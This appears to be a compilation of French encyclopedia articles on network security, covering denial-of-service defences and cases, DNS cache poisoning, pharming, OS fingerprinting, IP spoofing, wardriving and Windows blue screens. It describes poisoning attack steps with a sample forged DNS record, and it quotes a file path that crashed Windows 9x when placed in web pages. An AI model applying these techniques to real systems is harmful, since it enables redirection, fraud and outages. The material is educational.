Les protections contre les attaques de déni de service Les attaques par déni de service non distribuées peuvent être contrées en identifiant l'adresse IP de la machine émettant les attaques et en la bannissant au niveau du pare-feu ou du serveur. Les paquets IP provenant de la machine hostile sont dès lors rejetés sans être traités empêchant que le service du serveur ne soit saturé et ne se retrouve donc hors-ligne. Les attaques par déni de service distribuées sont plus difficiles à contrer. Le principe même de l'attaque par déni de service distribuée est de diminuer les possibilités de stopper l'attaque. Celle-ci émanant de nombreuses machines hostiles aux adresses différentes, bloquer les adresses IP limite l'attaque mais ne l'arrête pas. Thomas Longstaff de l'université Carnegie-Mellon explique à ce sujet que : « En réalité, la prévention doit plus porter sur le renforcement du niveau de sécurité des machines connectées au réseau [pour éviter qu'une machine puisse être compromise] que sur la protection des machines cibles [les serveurs Web] »[4]. Une architecture répartie, composée de plusieurs serveurs offrant le même service gérés de sorte que chaque client ne soit pris en charge que par l'un d'entre eux, permet de répartir les points d'accès aux services et offre, en situation d'attaque, un mode dégradé (ralentissement) souvent acceptable. Selon les attaques il est également possible de mettre un serveur tampon qui filtre et nettoie le trafic. Ce serveur, « cleaning center » permet en cas d'attaques de faire en sorte que les requêtes malveillantes ne touchent pas le serveur visé[5],[6]. L'utilisation de SYN cookies est également une solution envisageable pour éviter les attaques de type SYN flood, mais cette approche ne permet pas d'éviter la saturation de la bande passante du réseau. Attaque par déni de service 64

Retour aux conditions normales Le retour aux conditions normales après une attaque peut exiger une intervention humaine, car certains logiciels ne retrouvent pas un fonctionnement normal après une attaque de ce type.

Responsables et motifs de ces attaques

Acteurs Les attaques par déni de service sont souvent effectuées par des crackers peu expérimentés comme les lamers et les script kiddies. Elles peuvent être aussi menées par des crackers plus expérimentés, sous une forme délictueuse ou de défense (cf infra), à l'encontre de sites eux-mêmes hostiles ou menant des activités réputées illégales ou illégitimes. Un cas particulier d'attaque par déni de service est le SDoS ou Social Denial of Service. C'est une sorte d'effet Slashdot dans lequel l'afflux de requêtes provient en partie de badauds venant observer les effets d'un déni de service annoncé[7]. Les acteurs sont alors une multitude d'internautes bien réels, agissant de façon simultanée et stimulée.

Motifs Ces attaques sont aussi utilisées par un cracker qui ne réussit pas à prendre le contrôle d'un ordinateur en tentant de se faire passer pour une machine de confiance grâce à l'IP spoofing. En effet, en cas de demande de session (TCP SYN) avec une adresse IP « spoofée » qui serait celle de la machine de confiance, c'est bien cette dernière qui recevrait le paquet TCP SYN/ACK émis par la cible, donc elle réinitialiserait automatiquement la tentative de connexion avec un paquet RST (puisqu'elle n'est pas à l'origine de la demande d'établissement de session), interdisant au cracker d'établir une session. Depuis quelques années, l'attaque par déni de service distribuée est aussi utilisée à des fins de chantage auprès d'entreprises dont l'activité commerciale repose sur la disponibilité de leur site web. Ces fraudes sont habituellement le fait d'organisations criminelles (mafieuses) et non de crackers isolés. L'attaque par déni de service peut également être déclenchée à titre de défense, rétortion ou représailles, en réponse à des comportements des propriétaires de sites considérés comme agressifs par le cracker. Ce fut le cas par exemple des dénis de service constatés sur les sites des sociétés Visa, Mastercard, etc. dans le cadre de la campagne Avenge Assange réputée orchestrée par les Anonymous. Elle est également utilisée à visée destructrice envers des sites relayant un message jugé dérangeant par le cracker.

Risques juridiques Les crackers attaquant les serveurs internet au moyen d'attaques par déni de service sont depuis quelques années poursuivis par la justice de divers pays. Trois cas majeurs ont eu lieu. Le premier en août 2005. Jasmine Singh, 17 ans, a été condamné à cinq ans de prison à la suite d'une attaque par déni de service distribué à l'encontre de Jersey-Joe.com et Distant Replays commanditée par un concurrent des deux sites[8].

Au Royaume-Uni Depuis novembre 2006, avec le vote du Police and Justice Act (PJA), les attaques par déni de service distribué sont un délit passible de 10 ans de prison. Proposer des outils permettant de lancer des attaques DDoS est passible de 2 ans de prison ferme[8]. Attaque par déni de service 65

En Russie En 2008 la cour de Balakovo, la région de Saratov, a condamné trois crackers informatiques à huit ans de prison à la suite d'un chantage envers des sites de jeux en ligne. Les internautes demandaient plusieurs dizaines de milliers de dollars pour ne pas faire subir aux sites des attaques par déni de service distribué[8].

Exemples d'attaques par déni de service • Les attaques du groupe Anonymous sur les sites de Paypal, Visa et Mastercard, en représailles de l'abandon de leur soutien à WikiLeaks, début décembre 2010[9],[10] et contre le gouvernement tunisien début 2011[11] en réponse à des actes de censure commis par ce dernier[12] ainsi que le Sony Playstation Network en avril 2011 qui déclaraient : "nous allons supprimer tous les hackers du réseau"[13]. • Les attaques sur le serveur de WikiLeaks, notamment après les révélations de télégrammes de la diplomatie américaine, fin novembre 2010[14] ; • L'attaque sur le serveur de mise à jour de Microsoft ; • L'attaque de sites Web connus comme Google, Microsoft et Apple ; • Les attaques de type « ping flood » d'octobre 2002 et l'attaque par déni de service de février 2007 sur les serveurs racines du DNS. • Les attaques sur le site jaimelesartistes.fr, considéré comme un site de propagande pour la loi Hadopi. Cela a causé sa fermeture. • L'attaque du site Phayul.com en novembre 2010, selon Lobsang Wangyal[15] • L'attaque des sites justice.gov [16], fbi.gov [17], universalmusic.com [18], riaa.com [19], mpaa.com [20],copyright.gov [21] wmg.com [22], hadopi.fr [23] et justice.gouv.fr [24] le 19 janvier 2012. Cette attaque fut orchestrée par le groupe Anonymous en réponse à la fermeture de Megaupload.[réf. nécessaire]

Notes et références

[1] http:/ / www. arbornetworks. com/ en/ arbor-networks-releases-fifth-annual-infrastructure-security-report-2. html

[2] http:/ / www. 01net. com/ article/ 165103. html

[3] http:/ / www. 01net. com/ article/ 196756

[4] http:/ / www. certa. ssi. gouv. fr/ site/ CERTA-2000-INF-001/

[5] http:/ / blogs. orange-business. com/ securite/ 2009/ 02/ lutte-contre-les-attaques-en-ddos-retour-dexperience-partie-1. html

[6] http:/ / blogs. orange-business. com/ securite/ 2009/ 02/ lutte-contre-les-attaques-en-ddos-retour-dexperience-partie-2---fin. html

[7] reflets.info (http:/ / reflets. info/ le-patron-dhbgaryfed-demissionne-apres-la-mise-a-nu-de-sa-societe-par-les-anonymous/ ) « Anonymous a inventé le SDOS (Social Denial of Service), une version un peu plus évoluée que le Digg Effect (ou Slashdot Effect) »

[8] http:/ / www. zataz. com/ news/ 17802/ ddos--coulisse--attaque--informatique. html

[9] http:/ / blog. lesoir. be/ wikileaks/ 2010/ 12/ 08/ 642/

[10] IsItUp.Org/visa.com (http:/ / kleek. it/ 395BBC56) page capturée le 8 décembre 2010 à 21h33 GMT

[11] http:/ / www. liberation. fr/ monde/ 01012313297-operation-tunisia-la-cyberattaque-d-anonymous-aux-cotes-des-manifestants-tunisiens

[12] Anonymous activists target Tunisian government sites (http:/ / www. bbc. co. uk/ news/ technology-12110892) on bbc.co.uk

[13] http:/ / news. yahoo. com/ s/ afp/ 20110507/ tc_afp/ usjapanitinternetvideogamessony

[14] http:/ / www. lefigaro. fr/ flash-actu/ 2010/ 12/ 03/ 97001-20101203FILWWW00550-wikileaks-des-millions-de-cyberattaques. php

[15] Lobsang Wangyal, Leading Tibetan news portal suffers from DDoS attacks (http:/ / www. tibetsun. com/ archive/ 2010/ 11/ 10/

leading-tibetan-news-portal-suffers-from-ddos-attacks/ ), 10 novembre Tibet Sun

[16] http:/ / justice. gov

[17] http:/ / fbi. gov

[18] http:/ / universalmusic. com

[19] http:/ / riaa. com

[20] http:/ / mpaa. com

[21] http:/ / copyright. gov

[22] http:/ / wmg. com

[23] http:/ / hadopi. fr

[24] http:/ / justice. gouv. fr Empoisonnement du cache DNS 66 Empoisonnement du cache DNS

L'empoisonnement du cache DNS ou pollution de cache DNS (DNS cache poisoning ou DNS cache pollution en anglais) est une technique permettant de leurrer les serveurs DNS afin de leur faire croire qu'ils reçoivent une réponse valide à une requête qu'ils effectuent, alors qu'elle est frauduleuse. Une fois que le serveur DNS a été empoisonné, l'information est mise dans un cache, rendant ainsi vulnérable tous les utilisateurs de ce serveur. Ce type d'attaque permet, par exemple, d'envoyer un utilisateur vers un faux site dont le contenu peut servir à de l'hameçonnage (dans le cas du DNS, on parle de pharming) ou comme vecteur de virus et autres applications malveillantes. Un ordinateur présent sur Internet utilise normalement un serveur DNS géré par le fournisseur d'accès. Ce serveur DNS est la plupart du temps limité aux seuls utilisateurs du réseau du fournisseur d'accès et son cache contient une partie des informations rapatriées par le passé. Une attaque par empoisonnement sur un seul serveur DNS du fournisseur d'accès peut affecter l'ensemble de ses utilisateurs, soit directement ou indirectement si des serveurs esclaves s'occupent de propager l'information.

Introduction Pour mener à bien une attaque par empoisonnement de cache, l'attaquant exploite une vulnérabilité du serveur DNS qui accepte alors des informations incorrectes. Si le serveur ne valide pas les informations reçues et qu'il ne vérifie pas qu'elles proviennent d'une source fiable, alors il stockera dans son cache ces informations erronées. Il les transmettra par la suite aux utilisateurs qui effectuent la requête visée par l'attaque. Cette technique peut être employée pour substituer un contenu, que les victimes s'attendent à obtenir, par un autre contenu. L'attaquant peut par exemple rediriger un utilisateur d'un site web vers un autre site dont le serveur est compromis ou maintenu par l'attaquant. Selon le type d'attaque menée et afin de ne pas éveiller les soupçons, le nouveau contenu doit ressembler le plus possible au contenu original. Cette manipulation peut avoir plusieurs buts : • propagation de virus ou de vers en faisant croire à l'utilisateur qu'il télécharge des fichiers sains • hameçonnage (pharming) afin de collecter des informations personnelles, récupérer des mots de passe ou effectuer une fraude •• usurpation d'identité (on renvoie le site d'une personne vers un autre site) • attaque de l'homme du milieu (l'attaquant fait en sorte de se trouver au milieu de transactions afin de les intercepter, les déchiffrer et les rediriger de manière transparente) • propagande, contestation (par exemple en renvoyant un site d'un parti politique vers un autre parti) • guerre électronique (perturbation du réseau en renvoyant les utilisateurs vers d'autres sites qui ne leur permettent pas d'effectuer leur travail) • déni de service (renvoi vers un site n'existant pas, faisant croire à l'utilisateur que le serveur n'est plus disponible) ou guerre commerciale (voir l'affaire AlterNIC plus loin)

Aspects techniques Article détaillé : Domain Name System. Un serveur DNS permet d'obtenir l'adresse IP d'une cible à partir de son nom (par exemple l'entrée pour fr.wikipedia.org retourne 145.97.39.155). Afin d'obtenir cette IP, le serveur peut soit consulter son cache si l'information s'y trouve ou alors propager la requête plus loin, vers d'autres serveurs de manière récursive. L'ensemble du réseau est organisé selon un arbre subdivisé en domaines. Dans le cas de fr.wikipedia.org, le serveur DNS chargé du domaine .org va être interrogé, il va indiquer quel serveur peut donner des informations au sujet du domaine wikipedia.org. Finalement, ce dernier serveur indiquera l'IP complet pour fr.wikipedia.org. La Empoisonnement du cache DNS 67

validité des messages repose sur un identifiant de 16 bits qui doit être le même durant une transaction. Par ailleurs, le port et l'adresse utilisée pour la réponse doivent correspondre aux paramètres utilisés lors de l'envoi de la requête.

Attaque basée sur le paradoxe des anniversaires Cette attaque part du principe qu'un identifiant de 16 bits ne garantit pas une sécurité suffisante. Grâce au paradoxe des anniversaires, il est en effet possible de générer un grand nombre de messages de manière à tomber sur un identifiant valide. L'attaque se déroule comme suit et s'apparente à du spoofing : 1. Alice envoie un grand nombre de requêtes au serveur cible A, en spécifiant le nom de domaine (fr.wikipedia.org) dont elle voudrait obtenir l'IP 2. en même temps, elle se fait passer pour un autre serveur de nom B en préparant des réponses qui y ressemblent, mais avec des identifiants de transaction aléatoires (en vertu du paradoxe des anniversaires) de manière à produire un paquet comme celui attendu par le serveur cible. Elle spécifie par ailleurs un nouvel IP w.x.y.z 3. si le paquet correspond à ce qui était attendu par le serveur cible, alors celui-ci, en l'absence d'une protection particulière, insère l'information malveillante dans le cache où elle reste durant un certain temps (défini par le TTL, time to live) 4. Bob demande à accéder à Wikipédia, l'IP qu'il reçoit n'est plus celle de fr.wikipedia.org mais w.x.y.z La difficulté de cette attaque consiste à déterminer le port sur lequel le serveur B va répondre et à empêcher le vrai serveur de nom de répondre dans les temps. Si les ports sont aléatoires alors l'attaque sera beaucoup plus difficile, car elle nécessite plus de messages. Certaines attaques reposaient sur le fait que les générateurs de nombres pseudo-aléatoires des serveurs n'offraient pas un aléa suffisant. Des identifiants de transaction avaient ainsi plus de chance d'apparaître que d'autres, offrant à l'attaque une probabilité de réussite accrue. La solution à ce problème fut d'empêcher les demandes multiples émanant de la même source pour un même nom de domaine (c'est-à-dire qu'une seule requête d'Alice concernant fr.wikipedia.org est traitée à la fois).

Variante Pour contourner le problème lié au TTL, au lieu de susciter une requête pour fr.wikipedia.org, le pirate génère une série de requêtes pour des hôtes du même sous-domaine, par exemple xx.wikipedia.org, et tente à chaque fois un empoisonnement en tentant de deviner le numéro de transaction. La réponse consiste non pas en un enregistrement A vers un serveur pirate (dont l'IP est 6.6.6.6) mais un NS : xx.wikipedia.org IN NS fr.wikipedia.org fr.wikipedia.org IN A 6.6.6.6

Le second enregistrement est alors mis en cache, ce qui assure le succès de l'attaque. Le hacker peut envoyer de très nombreuses réponses (seule celle avec le numéro de transaction correct sera pris en compte), et le temps dont il dispose dépend de la rapidité de la réponse du serveur DNS légitime. Si cette tentative échoue, il peut recommencer immédiatement avec un autre hôte du sous-domaine, ce qui augmente de façon importante ses chances de succès. Les serveurs récursifs n'étant généralement accessibles qu'à certaines plages d'adresses IP (les clients), le hacker peut utiliser une fausse adresse IP source ou bien générer un trafic qui résultera probablement en une requête DNS (SMTP HELO, scanning, etc). Empoisonnement du cache DNS 68

Attaque par l'ajout de plusieurs résolutions L'attaquant dispose d'un serveur de nom pour un domaine (par exemple empoisonnement-dns.com). Le but est de polluer le cache du serveur cible A en se basant sur une vulnérabilité et en procédant comme suit : 1. Alice demande l'IP de empoisonnement-dns.com au serveur cible A 2.2.le serveur A ne dispose pas de cette information dans son cache, il contacte alors le serveur de nom pour le domaine 3. le serveur de nom, sous le contrôle de l'attaquant, renvoie les informations concernant empoisonnement-dns.com, mais ajoute des informations concernant d'autres sites dans sa réponse, par exemple l'adresse de fr.wikipedia.org qu'il fait pointer vers un autre site dont l'IP est w.x.y.z 4. le serveur insère l'information malveillante dans le cache où elle reste durant un certain temps (défini par le TTL, time to live) 5. Bob demande à accéder à Wikipédia, l'IP qu'il reçoit n'est plus celle de fr.wikipedia.org, mais w.x.y.z Cette attaque a été utilisée en juin 1997 par Eugene Kashpureff qui gérait un serveur DNS alternatif à la racine du système (nommé AlterNIC). Kashpureff redirigea le trafic d'Internic (son concurrent direct) vers le site d'AlterNIC [1]. Nommée Operation DNS Storm, son action lui valut d'être arrêté quelques mois plus tard[2].

Prévention et défense La plupart des attaques peuvent être évitées en ajoutant des vérifications supplémentaires. Dans le cas d'une attaque comme celle d'Eugene Kashpureff, la parade consiste à vérifier que la réponse correspond à ce qui était attendu (l'IP du nom de domaine demandé et rien d'autre) et à l'ignorer dans le cas contraire. L'amélioration des générateurs de nombres pseudo-aléatoires en utilisant des générateurs cryptographiques pour l'identifiant de 16 bits et les ports ont permis de limiter les problèmes dans les serveurs les plus utilisés (dont BIND[3]). La limitation des demandes multiples pour un même nom à partir d'une même source a partiellement réduit l'attaque par le paradoxe des anniversaires, mais elle pourrait être menée à partir d'un botnet, ce qui nécessite d'autres moyens de défense pour détecter les tentatives de ce type. Une version sécurisée du DNS existe, DNSSEC, qui se base sur des signatures électroniques avec un certificat qui permet de vérifier l'authenticité des données. Il reste toutefois peu répandu. L'empoisonnement peut être limité au niveau des couches transport ou application grâce à une authentification des intervenants, via par exemple TLS. Un serveur DNS pourrait ainsi s'assurer qu'il reçoit bien les informations depuis un serveur de confiance. Il en va de même pour les autres applications comme les navigateurs qui peuvent vérifier l'authenticité d'une page grâce aux certificats. En juillet 2008, des mises à jour de sécurité concernant les serveurs DNS ont été effectuées par un grand nombre d'acteurs du logiciel libre et propriétaire. Ces mises à jour ont été effectuées de façon synchronisée pour remédier à une faille découverte plusieurs mois avant par Dan Kaminski (de la société IOActive) qui s'avérait critique. Cette faille a été jugée suffisamment sérieuse pour que le secret soit conservé le temps de mettre en place des solutions de protection[4]. Empoisonnement du cache DNS 69

Références

[1] The Pharming Guide (pdf) (http:/ / www. ngssoftware. com/ papers/ ThePharmingGuide. pdf)

[2] Eugene E. Kashpureff Pleaded Guilty to Unleashing Software on the Internet (http:/ / www. usdoj. gov/ criminal/ cybercrime/ kashpurepr. htm)

[3] BIND 9 DNS Cache Poisoning (http:/ / www. trusteer. com/ docs/ bind9dns. html)

[4] Dépêche AFP au sujet de la faille révélée en juillet 2008 (http:/ / afp. google. com/ article/ ALeqM5j4zdJb6UMCP0XIFnPyE0LP89H3jQ)

Liens externes

• (en) Test le DNS de votre ISP (https:/ / www. dns-oarc. net/ oarc/ services/ dnsentropy)

• Portail de la sécurité informatique Pharming

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le pharming (ou dévoiement[1] en français) est une technique de piratage informatique exploitant des vulnérabilités DNS. Cette technique ouvre de manière à ce que pour une requête DNS pour un nom de domaine ce ne soit pas l'IP réelle du nom de domaine qui soit donnée mais celle d'un site frauduleux.

Historique Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [2] est la bienvenue !

Mode opératoire et types Il existe deux types d'attaques par pharming : • La première consiste à modifier un serveur DNS local. Les internautes demandant un nom de domaine se feront ainsi rediriger vers le serveur frauduleux[3]. • La seconde est réalisée au moyen d'un logiciel malveillant reconfigurant les paramètres réseau du matériel informatique infecté, que ce soit un poste de travail ou un routeur[4]. Cette reconfiguration agit de manière à ce que l'internaute soit pour les noms de domaines prédéterminés redirigé vers le serveur frauduleux[5]. Ce type d'hameçonnage permet de voler des informations (principalement des mots de passe) après avoir attiré la victime sur un site web maquillé afin de ressembler au site demandé par l'utilisateur, et ce même si le nom de domaine est correctement saisi. Pharming 70

Prévention et protection Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [2] est la bienvenue ! La protection la plus efficace contre les attaques par pharming est l'utilisation du protocole DNS sécurisé DNSSEC.

Notes et références

[1] {fr} http:/ / www. legifrance. gouv. fr/ affichTexte. do?cidTexte=JORFTEXT000021530619& dateTexte=& categorieLien=id

[2] http:/ / fr. wikipedia. org/ w/ index. php?title=Pharming& action=edit

[3] http:/ / www. citi. umich. edu/ u/ provos/ papers/ ndss08_dns. pdf

[4] http:/ / www. schneier. com/ blog/ archives/ 2007/ 02/ driveby_pharmin. html

[5] http:/ / blogs. orange-business. com/ securite/ 2008/ 05/ le-dns-une-pierre-angulaire-en-danger. html

Prise d'empreinte de la pile TCP/IP

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

La prise d'empreinte de la pile TCP/IP (en anglais : TCP/IP stack fingerprinting ou OS fingerprinting) est un procédé permettant en informatique de déterminer l'identité du système d'exploitation utilisé sur une machine distante en analysant les paquets provenant de cet hôte. Il y a deux types différents de fingerprinting : •• L'OS fingerprinting passif qui consiste à identifier le système d'exploitation uniquement à l'aide des paquets qu'il reçoit et ce en n'envoyant aucun paquet. • L'OS fingerprinting actif qui, au contraire, envoie des paquets et en attend les réponses (ou l'absence de réponses). Ces paquets sont parfois formés de manière étrange car les différentes implémentations des piles TCP/IP répondent différemment face à de telles erreurs. Quelques outils de détection d'OS : • Actif : Nmap, xprobe [1], Scapy, • Passif : p0f (basé sur ouvertures de connexion TCP, paquets TCP SYN), Scapy, Ettercap, le pare-feu Netfilter à partir du noyau 2.6.31 de Linux.

Références

[1] http:/ / www. sys-security. com/ Usurpation d'adresse IP 71 Usurpation d'adresse IP

Cet article ne cite pas suffisamment ses sources (mai 2012). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

L'usurpation d'adresse IP (en anglais : IP spoofing ou IP address spoofing) est une technique utilisée en informatique qui consiste à envoyer des paquets IP en utilisant une adresse IP source qui n'a pas été attribuée à l'ordinateur qui les émet. Le but peut être de masquer sa propre identité lors d'une attaque d'un serveur, ou d'usurper en quelque sorte l'identité d'un autre équipement du réseau pour bénéficier des services auxquels il a accès.

Explications Le protocole IP et le routage sur Internet ne vérifient pas l'adresse source. Cette caractéristique du protocole IP n'est en fait pas un défaut mais une fonctionnalité voulue. Internet ayant été développé par l'armée américaine, il a été conçu pour permettre au routage des paquets IP de s'adapter en fonction des coupures réseau, comme par exemple lors d'une attaque nucléaire. Ainsi les routeurs ne sont pas censés avoir de préjugé sur l'origine des paquets. Sauf en cas de restriction du point d'accès à Internet, n'importe quel ordinateur peut fabriquer un paquet IP avec n'importe quelle adresse source. Cette technique peut ainsi servir à masquer son adresse source réelle ou à attaquer des réseaux en usurpant l'adresse d'un autre ordinateur. Pour établir un lien bidirectionnel entre deux hôtes, comme par exemple avec le protocole TCP, il est cependant nécessaire que le routage entre les deux systèmes soit possible. L'usurpation d'adresse d'un autre sous-réseau implique donc l'altération de tables de routage des routeurs intermédiaires.

Historique En 1995, un CERT publie le premier avertissement concernant l'usurpation d'adresse IP[2]. En effet, certains services peu sécurisés comme rsh se basent sur l'adresse IP pour identifier l'émetteur. L'exemple typique est d'utiliser une relation de confiance. Un pirate utilisera donc l'adresse IP d'une machine de confiance (autorisée) pour obtenir une connexion à un serveur.

Recommandation Pour éviter ce genre d'attaques, il est recommandé de ne pas utiliser de service se basant sur l'adresse IP pour identifier les clients. Des algorithmes cryptographiques peuvent être utilisés pour authentifier le correspondant, comme c'est le cas par exemple dans IPsec, SSL, SSH. Il est recommandé que le système d'exploitation utilisé génère des numéros de séquences difficilement prévisibles au niveau de TCP[3]. Sur un ordinateur, les algorithmes générateurs de nombres aléatoires sont toujours pseudo-aléatoires. L'aspect déterministe du comportement d'un ordinateur qui est ce pourquoi les ordinateurs sont utilisés, devient un problème quand les questions de sécurité et de chiffrement sont abordées. Pour les protocoles utilisant plusieurs connexions TCP (comme FTP), il est recommandé d'utiliser des numéros de port non prévisibles. Quand l'application s'en remet au système pour attribuer le numéro de port c'est alors au système d'implémenter cette recommandation. Une solution peut être de refuser les paquets TCP SYN successifs depuis une même adresse pour éviter que le pirate puisse prédire le comportement du générateur de numéros de séquences. Mais une telle restriction peut limiter la disponibilité du service (attaque par déni de service ou DoS). Usurpation d'adresse IP 72

L'usurpation d'adresse IP peut également être utilisée pour masquer l'identité du hacker lors d'attaques de type déni de service ou d'attaque par rebond. Dans ce cas-là, une adresse IP différente peut être utilisée pour chacun des paquets de l'attaque, ce qui rend inefficace toute tentative de filtrage intelligent. Les administrateurs de réseaux locaux peuvent utiliser le filtrage des adresses IP sources entrantes des clients finaux[4]. Ceci peut aussi être accompli de façon automatique grâce au Reverse path forwarding (uRPF), qui indique au routeur de vérifier le routage de l'adresse IP source de tout paquet entrant par une interface, et si l'interface de réception diffère de l'interface de routage, de détruire le paquet, ce qui rend toute tentative d'usurpation inopérante. Ceci n'est pas possible en cas de routage asymétrique. Ce filtrage sera plus efficace s'il est effectué proche de la source. Un utilisateur final qui voudrait donc partager le trafic sortant entre deux liens vers des fournisseurs d'accès différents s'en verrait empêché, chacun des fournisseurs n'autorisant que des adresses source attendues.

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Usurpation_d%27adresse_IP& action=edit

[2] premier avertissement (http:/ / www. cert. org/ advisories/ CA-1995-01. html) du CERT sur l'usurpation d'adresse IP [3][3]voir RFC 1948 [4] RFC 3704, Ingress Filtering for Multihomed Networks

Articles connexes •• Usurpation d'identité •• Attaque de Mitnick •• SYN cookie •• ARP poisoning

Liens externes

• (en) premier avertissement (http:/ / www. cert. org/ advisories/ CA-1995-01. html) du CERT sur l'usurpation d'adresse IP

• (en) deuxième avertissement (http:/ / www. cert. org/ advisories/ CA-1996-21. html) du CERT sur l'usurpation d'adresse IP

• (fr) Explication détaillée de l'IP spoofing (http:/ / www. commentcamarche. net/ attaques/ usurpation-ip-spoofing. php3)

• (en) L'alliance globale sur l'authentification sur l'Internet (http:/ / www. aotalliance. org/ )

• (en) Spoofing exemple - étude de cas (http:/ / www. oil-offshore-marine. com/ aker-kvaerner-fraud-attack. php)

Notes et références

• Portail de la sécurité informatique • Portail des réseaux informatiques Wardriving 73 Wardriving

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le wardriving (de l'anglais, war pour wireless access research - mais l'acronyme correspond au mot guerre - et de driving pour conduite) consiste à balayer des réseaux sans fil à l'aide d'un ordinateur ou d'un PDA en utilisant une automobile comme moyen de transport. Le but est de pénétrer sans autorisation dans ces réseaux pour obtenir librement et anonymement un accès à internet ou aux postes connectés. Cette technique s'est principalement développée avant la sécurisation systématique des connexions sans fil. Elle tend aujourd'hui à disparaître, mais quelques réseaux Wi-Fi restent encore, par négligence ou méconnaissance de leurs propriétaires, accessibles librement, sans chiffrement ni clé d'accès. De plus, une protection de chiffrement utilisée naguère couramment (le WEP, Wired Equivalent Privacy) peut être cassée en une dizaine de minutes par interception et analyse des échanges réseau. Les clés WPA (Wi-Fi Protected Access), ont un plus haut niveau de sécurité, même si certaines techniques sont actuellement en cours de développement pour en venir à bout. Leur sécurité devient bonne avec des clés de chiffrement longues (20 caractères, par exemple). Le wardriving est utilisé pour pouvoir accéder à internet au nom d'une autre personne et donc pouvoir, par exemple, se livrer à des actes de piratage sans pouvoir être inquiété. Les wardrivers utilisent de temps à autre un GPS (ex: un GPS Bluetooth) connecté à un PDA où est installé une application qui répertorie les coordonnées géographiques, les SSID, les adresses MAC... des points d'accès balayés pour ensuite les importer dans un logiciel de cartographie (ou site tel google-maps) pour avoir une carte complète des réseaux balayés ainsi que toutes les informations récoltées.

Liens externes • Wardriving.com [1] [2] • Trébucher sans fil (sur l'Internet Archive)

• Portail de la sécurité informatique

Références

[1] http:/ / www. wardriving. com

[2] http:/ / waybackmachine. org/ */ http:/ / www. wifi-montauban. net/ communaute/ index. php/ TrebucherSansFil 74

2.3-Système

Écran bleu de la mort

Cet article ne cite pas suffisamment ses sources (octobre 2008). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

L’écran bleu de la mort aussi abrégé BSoD de l’anglais Blue Screen of Death se réfère à l’écran affiché par le système d’exploitation Microsoft Windows lorsqu’il ne peut plus récupérer une erreur système ou lorsqu’il est à un point critique d’erreur fatale. Il y a deux types d’écrans d’erreur, dont l’un est l’écran bleu de la mort, qui a une signification d’erreur plus sérieuse que l’autre.

Un BSoD est également un « arrêt d’urgence » décrit dans les manuels de Windows XP. Les écrans bleus de la mort ont toujours été présents sous une forme ou l’autre dans tous les systèmes d’exploitation de Microsoft depuis la version 2.0 de Windows. Ils sont un caractère quasi folklorique de ce système d’exploitation, source de raillerie, mais surtout d’énervement.

Types d'écrans bleus

Un écran bleu sur un téléphone public. Écran bleu de la mort 75

Windows 9x/Me

L’écran bleu le moins critique (mais le plus courant) survient avec les systèmes d’exploitation Microsoft Windows 95, 98 et Me. Dans ces systèmes d’exploitation, le BSoD est le principal chemin pour afficher les rapports d’erreur VxD à destination de l’utilisateur. En interne, on y réfère par le nom de « _VWIN32_FaultPopup ». Il se présente sous la forme d’un écran bleu affichant des informations sur l’erreur produite.

Un BSoD sous Windows 9x/Me donne à l’utilisateur la faculté de redémarrer ou de continuer. Cependant, VxD n’affiche pas de BSoD de façon fantaisiste, l’erreur Écran bleu de la mort sous Windows 95. survenue ne pouvant être résolue ainsi, il est donc recommandé de redémarrer sa machine, car la reprise de l’exploitation après un BSoD est souvent aléatoire voire impossible.

La cause la plus fréquente de BSoD est généralement due à une incompatibilité de version de DLLs. Cette cause fait parfois référence à l’« enfer des DLL » en anglais : DLL hell. Windows charge ces bibliothèques en mémoire lorsqu’elles sont requises par une application. Si les versions ont changé, lors du prochain chargement par l’application, la version attendue n’est pas celle chargée. Ce genre d’incompatibilité augmente avec le nombre de nouvelles applications installées, c’est pourquoi une copie de Windows fraîchement installée sera plus stable qu’une « ancienne ».

Avec Windows 95 et 98, un BSoD survient lorsque le système tente d’accéder au fichier « c:\con\con ». Cette ligne est parfois insérée dans des pages Internet dans le but de planter les machines tournant avec ces systèmes d’exploitation. Microsoft a mis à disposition un correctif[2]. Un BSoD peut également apparaître lorsqu’un utilisateur éjecte une disquette ou un CD/DVD en cours de lecture par Windows 9x/ME.

Windows XP/2000/NT

Dans Windows NT, 2000 et XP, un écran bleu de la mort (« arrêt » d’urgence) survient lorsque le noyau rencontre une erreur qu’il ne peut traiter. Ce genre d’erreur est généralement causé par un pilote qui a lancé une opération illégale ou provoqué une exception non permise. La seule opération que l’utilisateur peut effectuer dans ce cas est de redémarrer sa machine avec le risque de perte de données due à la fermeture incorrecte de Windows. Mais cela arrive beaucoup moins souvent qu’avec Windows 9x.

Le message d’« arrêt » contient le code d’erreur et son nom symbolique (exemple : 0x0000001E, Écran bleu de la mort sous Windows NT. KMODE_EXCEPTION_NOT_HANDLED) ainsi que Écran bleu de la mort 76

quatre valeurs dépendant de l’erreur entre parenthèses. Il affiche l’adresse mémoire où s’est produit le problème ainsi que le nom du pilote en question. Sous Windows NT et 2000, les deuxième et troisième sections de l’écran contiennent respectivement des informations sur tous les pilotes chargés ainsi que la vidange de la pile. Les informations des pilotes sont affichées sur trois colonnes. La première colonne donne l’adresse de base du pilote, la seconde liste les dates de création des pilotes sous forme d’horodatage Unix et la troisième affiche le nom des pilotes.

